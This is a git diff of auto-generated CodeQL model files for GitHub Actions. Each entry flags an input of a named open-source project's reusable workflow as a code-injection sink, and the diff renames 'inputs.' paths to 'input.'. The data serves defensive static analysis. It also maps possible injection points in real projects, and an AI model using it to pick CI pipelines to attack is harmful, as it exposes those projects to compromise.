--- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"]
- - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"]
\ No newline at end of file
+ - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"]
+ - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
index 7ca34fc3e44d..4bd74701fde7 100644
--- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"]
- - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"]
\ No newline at end of file
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
index d3cc8e73b708..34d11e19946b 100644
--- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"]
- - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"]
\ No newline at end of file
+ - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"]
+ - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
index a9f8401aab2d..fb4a82488530 100644
--- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"]
\ No newline at end of file
+ - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
index acf43426e564..ef3af44da3a8 100644
--- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"]
- - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"]
+ - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
index 3c9178a91258..a8c86c49d7c0 100644
--- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"]
- - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"]
- - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"]
\ No newline at end of file
+ - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"]
+ - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"]
+ - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
index 24603c25a777..40549844d385 100644
--- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"]
- - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"]
- - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"]
- - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"]
\ No newline at end of file
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
index 29f01c24bedd..bd180d9b3676 100644
--- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"]
\ No newline at end of file
+ - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
index acad489dbe51..1e5721f1e7c5 100644
--- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"]
- - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"]
\ No newline at end of file
+ - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"]
+ - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
index e15b6d33042f..b7a14240aed5 100644
--- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"]
\ No newline at end of file
+ - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
index 12c9f97b7a40..1a276f8812f7 100644
--- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"]
\ No newline at end of file
+ - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
index 685944420aaa..ef448c8f4c0d 100644
--- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"]
- - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"]
\ No newline at end of file
+ - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"]
+ - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
index 884c3d154ad7..6c6721700258 100644
--- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"]
- - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"]
\ No newline at end of file
+ - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"]
+ - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
index 799958a7feef..b7104a8b6153 100644
--- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
index 32d3e59e1f8c..cd81a7239066 100644
--- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"]
- - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"]
- - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"]
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"]
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
index f2893eb24070..1b2ce37480f5 100644
--- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
- - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
- - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"]
- - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
+ - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
index ea3b2029f822..91889927c452 100644
--- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"]
- - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"]
- - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"]
- - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"]
- - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"]
\ No newline at end of file
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
index 0c5427134309..8d4400bd3ead 100644
--- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 4c0442abd2b5..29c7e1bd3e24 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 39c81d39066c..109dce9df0db 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index b5d1263f743f..e3643f0156b2 100644 
--- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index ffb08a8fa2e9..a4bba59b5a5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 4012908e7e9a..d12982c35a45 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index a1af8280ebc7..deb10e5e4b4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 84de5681fea5..5c22f0ffcb76 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] - - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index c9e8b5c23c0f..790e94c2aacd 100644 
--- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 80dde7f2fc0e..fedb21393bc3 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1ffaa4e1cd0f..f60fffb206e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 48b35d83c702..c7fe932aba20 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index e1a0c8a9fcf3..d47aea3363f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 71cd3fed3ed4..f32acf5038ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml 
